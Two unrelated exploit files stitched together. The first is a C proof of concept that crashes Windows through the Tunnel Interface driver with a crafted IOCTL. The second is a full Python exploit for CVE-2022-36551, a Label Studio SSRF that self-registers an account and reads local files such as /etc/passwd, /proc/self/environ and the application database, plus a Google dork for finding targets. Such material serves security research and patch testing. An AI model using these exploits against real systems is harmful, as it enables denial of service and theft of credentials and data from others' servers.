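// Exploit Title: Tunnel Interface Driver - Denial of Service
// Date: 07/15/2022
// Exploit Author: ExAllocatePool2
// Vendor Homepage: https://www.microsoft.com/
// Software Link: https://www.microsoft.com/en-us/software-download/windows10
// Version: Windows 10 Pro Version 21H2 (OS Build 19044.1288)
// Tested on: Microsoft Windows
// GitHub Repository: https://github.com/Exploitables/MSRC-1
//
// WARNING: this is a kernel denial-of-service proof of concept. A successful run
// bug-checks (blue-screens) the machine it is executed on. Run it only inside a
// disposable VM or lab host with nothing unsaved, never on a production system.

#include <Windows.h>
#include <stdio.h>

// The device is reached through the GLOBALROOT symbolic link, so no DOS device
// name has to exist for it.
#define TARGET_DEVICE "\\\\.\\GLOBALROOT\\Device\\TunnelControl"

// Control code 0 decodes (CTL_CODE layout) to device type 0, required access
// FILE_ANY_ACCESS, function 0, METHOD_BUFFERED. FILE_ANY_ACCESS is why a handle
// opened with nothing more than FILE_READ_ATTRIBUTES (0x80) reaches the driver's
// IOCTL dispatch routine at all.
#define TARGET_IOCTL 0
#define OPEN_ACCESS  FILE_READ_ATTRIBUTES

// Entry point: opens the tunnel control device with minimal access, prints a
// short countdown, then sends one 8-byte IOCTL that the vulnerable driver does
// not survive. Returns 1 if the device could not be opened, 0 otherwise (only
// reached when the machine did not crash).
int main(int argc, char** argv)
{
    (void)argc;
    (void)argv;

    // 8 bytes of recognisable filler used as both input and output buffer.
    unsigned long long input_output = 0x4242424242424242ULL;
    unsigned long bytes_returned = 0x43434343;

    SetConsoleTitleA("https://msrc.microsoft.com/");

    printf("[*] Microsoft Security and Response Center Report #1\n[*] Microsoft Tunnel Interface Driver Null Pointer Dereference Denial of Service Vulnerability\n[*] Exploit written by ExAllocatePool2\n[!] Let's exploit!");

    // Open the device immediately before the check: SetConsoleTitleA/printf
    // in between could overwrite the thread's last-error value, so the
    // original ordering could report a wrong error code on failure.
    HANDLE h_driver = CreateFileA(TARGET_DEVICE, OPEN_ACCESS, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (h_driver == INVALID_HANDLE_VALUE)
    {
        // Read the error once; a second GetLastError() after the first printf
        // argument is evaluated is not guaranteed to see the same value.
        DWORD err = GetLastError();
        printf("\n[-] Failed to obtain a handle to the vulnerable device driver. Error: %lu (0x%lx)", err, err);
        (void)getchar();
        return 1;
    }
    printf("\n[+] Obtained a handle to the vulnerable device driver. Handle Value: 0x%p", h_driver);

    // Give the operator a moment to abort before the box goes down.
    printf("\n[!] Triggering a denial of service via arbitrary read in 3...");
    for (int i = 2; i > 0; i--)
    {
        Sleep(1000);
        printf("\n[!] %d...", i);
    }

    // The crash happens inside this call on an unpatched driver, so nothing
    // below normally executes.
    DeviceIoControl(h_driver, TARGET_IOCTL, &input_output, sizeof(input_output),
                    &input_output, sizeof(input_output), &bytes_returned, NULL);

    // Reached only when the driver survived the request (e.g. a patched build).
    (void)getchar();
    printf("\n[-] Exploit failed. The machine should have crashed.");
    CloseHandle(h_driver);
    return 0;
}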
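# Exploit Title: Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)
# Google Dork: intitle:"Label Studio" intext:"Sign Up" intext:"Welcome to Label Studio Community Edition"
# Date: 2022-10-03
# Exploit Author: @DeveloperNinja, IncisiveSec@protonmail.com
# Vendor Homepage: https://github.com/heartexlabs/label-studio, https://labelstud.io/
# Software Link: https://github.com/heartexlabs/label-studio/releases
# Version: <=1.5.0
# CVE : CVE-2022-36551
# Docker Container: heartexlabs/label-studio

# Server Side Request Forgery (SSRF) in the Data Import module in Heartex - Label Studio Community Edition
# versions 1.5.0 and earlier allows an authenticated user to access arbitrary files on the system.
# Furthermore, self-registration is enabled by default in these versions of Label Studio enabling a remote
# attacker to create a new account and then exploit the SSRF.
#
# This exploit has been tested on Label Studio 1.5.0
#
# Operational notes:
# - Every step is authenticated and leaves a trail on the target: an account (when --register is used),
#   a project create/delete pair and an import record. Use only against systems you are authorised to test.
# - TLS certificate verification is OFF unless --verify-tls is given, so the credentials sent to an
#   https:// target can be intercepted on the path. Pass --verify-tls whenever the target has a valid cert.
# - The vulnerable parameter is the "url" field of the project import endpoint; the scheme is not
#   restricted server-side, which is what lets a file:// URL read local files.
#

# Exploit Usage Examples (replace with your target details):
# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /etc/passwd
# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /proc/self/environ
# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /label-studio/data/label_studio.sqlite3 --out label_studio.sqlite3.sqlite3


import argparse
import json
import shutil
import sys
from urllib.parse import urljoin
from urllib.parse import urlparse

import requests

# Silence InsecureRequestWarning for the (default) unverified-TLS mode.
requests.packages.urllib3.disable_warnings()

# Substring Label Studio renders into the login page when the credentials are rejected.
LOGIN_FAILED_MARKER = "The email and password you entered"


def main(url, filePath, writePath, username, password, shouldRegister, verifyTls=False):
    """Run the full exploit chain: reachability check, login, project create, import, project delete.

    Args:
        url: base URL of the Label Studio instance (e.g. http://host:8080/).
        filePath: path or URL to fetch through the import endpoint; a bare path gets a file:// scheme.
        writePath: local file to save the fetched content to, or None to print it to stdout.
        username: account email (existing, or to be created with shouldRegister).
        password: account password.
        shouldRegister: register the account if the login is rejected.
        verifyTls: verify the server certificate; off by default to keep the original behaviour
            against self-signed lab targets (see the header note on the risk).

    Exits the process with status 1 on any unrecoverable step.
    """
    if not username or not password:
        print("[!] Error: --username and --password are required (add --register to create the account)")
        sys.exit(1)

    # check if the URL is reachable
    try:
        r = requests.get(url, verify=verifyTls)
    except requests.exceptions.RequestException:
        print("[!] Error: URL is not reachable, check the URL and try again")
        sys.exit(1)
    if r.status_code != 200:
        print("[!] Error: URL is not reachable, check the URL and try again")
        sys.exit(1)
    print("[+] URL is reachable")

    # A session keeps the csrftoken/sessionid cookies across the steps; the context manager
    # closes the pooled connections when we are done.
    with requests.Session() as session:
        session.verify = verifyTls

        login(session, url, username, password, shouldRegister)
        print("[+] Logged in")
        print("[+] Creating project...")

        # Create a temp project
        projectDetails = create_project(session, url)
        print("[+] Project created, ID: {}".format(projectDetails["id"]))

        # time for the actual exploit, import a "file" to the newly created project
        # (IE: file:///etc/passwd, or file:///proc/self/environ)
        print("[+] Attempting to fetch: {}".format(filePath))
        fetch_file(session, url, projectDetails["id"], filePath, writePath)

        print("[+] Deleting Project.. {}".format(projectDetails["id"]))
        delete_project(session, url, projectDetails["id"])
        print("[+] Project Deleted")

    print("[*] Finished executing exploit")


def login(session, url, username, password, shouldRegister):
    """Authenticate *session* against Label Studio, registering the account first if asked to.

    Exits the process if neither login nor registration succeeds.
    """
    # hit the main page first to get the CSRF token set
    session.get(url)

    r = session.post(
        urljoin(url, "/user/login"),
        data={
            "email": username,
            "password": password,
            "csrfmiddlewaretoken": session.cookies["csrftoken"],
        },
    )

    if r.status_code == 200 and LOGIN_FAILED_MARKER not in r.text:
        return

    if LOGIN_FAILED_MARKER in r.text and shouldRegister:
        print("[!] Account does not exist, registering...")
        # Do not follow redirects here: the success signal is the 302 the server answers a
        # successful signup with. With redirects followed the final status is 200 whether
        # the signup worked or the form was re-rendered with an error, so failures went
        # unnoticed and the script carried on as if logged in.
        r = session.post(
            urljoin(url, "/user/signup/"),
            data={
                "email": username,
                "password": password,
                "csrfmiddlewaretoken": session.cookies["csrftoken"],
                "allow_newsletters": False,
            },
            allow_redirects=False,
        )
        if r.status_code == 302:
            # at this point the system automatically logs you in
            # (assuming self-registration is enabled, which it is by default)
            return
        # Presumably a rejected signup (email taken, password policy, registration disabled).
        print("[!] Error: Registration failed (HTTP {}), check the email/password and whether signup is enabled".format(r.status_code))
        sys.exit(1)

    print("[!] Error: Could not login, check the credentials and try again")
    sys.exit(1)


def create_project(session, url):
    """Create a throw-away project to import into and return its decoded JSON (callers use ["id"])."""
    r = session.post(
        urljoin(url, "/api/projects"),
        data={
            "title": "TPS Report Finder",
        },
    )

    if r.status_code in (200, 201):
        return r.json()
    print("[!] Error: Could not create project, check your credentials / permissions")
    sys.exit(1)


def _as_import_url(filePath):
    """Return *filePath* with a file:// scheme prepended when it has no scheme of its own."""
    if urlparse(filePath).scheme == "":
        return "file://" + filePath
    return filePath


def _validation_error(r):
    """Extract the first server-side validation message from an import error response, if there is one."""
    try:
        return r.json()["validation_errors"]["non_field_errors"][0]
    except (ValueError, KeyError, IndexError, TypeError):
        # Non-JSON or differently shaped error body: show what we got instead of crashing.
        return "HTTP {}: {}".format(r.status_code, r.text[:200])


def fetch_file(session, url, projectId, filePath, writePath):
    """Import *filePath* into the project through the vulnerable endpoint and retrieve the stored copy.

    The content is written to *writePath* when given, otherwise printed to stdout.
    Prints an error and returns on failure (the caller still deletes the project).
    """
    targetUrl = _as_import_url(filePath)

    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    importUrl = urljoin(url, "/api/projects/{}/import".format(projectId))
    r = session.post(importUrl,
        data={
            "url": targetUrl,  # This is the main vulnerability, there is no restriction on the "schema" of the provided URL
        },
        headers=headers,
    )

    if r.status_code != 201:
        print("[!] Error: Could not fetch file, it's likely the file path doesn't exist: ")
        print("\t" + _validation_error(r))
        return

    # file found! -- first grab the file path details, then download the stored upload
    fileId = r.json()["file_upload_ids"][0]
    meta = session.get(urljoin(url, "/api/import/file-upload/{}".format(fileId)), headers=headers)
    r = session.get(urljoin(url, "/data/{}".format(meta.json()["file"])), headers=headers, stream=True)
    print("[+] File found!")

    # if user wants to write to disk, make it so
    if writePath is not None:
        print("[+] Writing to {}".format(writePath))
        # Undo any content-encoding so the bytes on disk match the file the server read.
        r.raw.decode_content = True
        with open(writePath, 'wb') as handle:
            shutil.copyfileobj(r.raw, handle)
        return

    print("==========================================================")
    print(r.text)
    print("==========================================================")


def delete_project(session, url, projectId):
    """Delete the temporary project; exits the process if the server refuses."""
    r = session.delete(urljoin(url, "/api/projects/{}".format(projectId)))
    if r.status_code in (200, 204):
        return
    print("[!] Error: Could not delete project, check your credentials / permissions")
    sys.exit(1)


def _parse_args(argv=None):
    """Build the CLI and parse *argv* (defaults to sys.argv[1:])."""
    parser = argparse.ArgumentParser()

    parser.add_argument("--url", required=True, help="Label Studio URL")
    parser.add_argument("--file", required=True, help="Path to the file you want to fetch")
    parser.add_argument("--out", required=False, help="Path to write the file. If omitted will be written to STDOUT")
    parser.add_argument("--username", required=False, help="Username for existing account (email)")
    parser.add_argument("--password", required=False, help="Password for existing account")
    parser.add_argument("--register", required=False, action=argparse.BooleanOptionalAction, help="Register user if it doesn't exist",
    )
    parser.add_argument("--verify-tls", required=False, action="store_true",
                        help="Verify the target's TLS certificate (off by default; without it credentials are exposed to interception on https:// targets)")

    return parser.parse_args(argv)


if __name__ == "__main__":
    args = _parse_args()
    main(args.url, args.file, args.out, args.username, args.password, args.register, verifyTls=args.verify_tls)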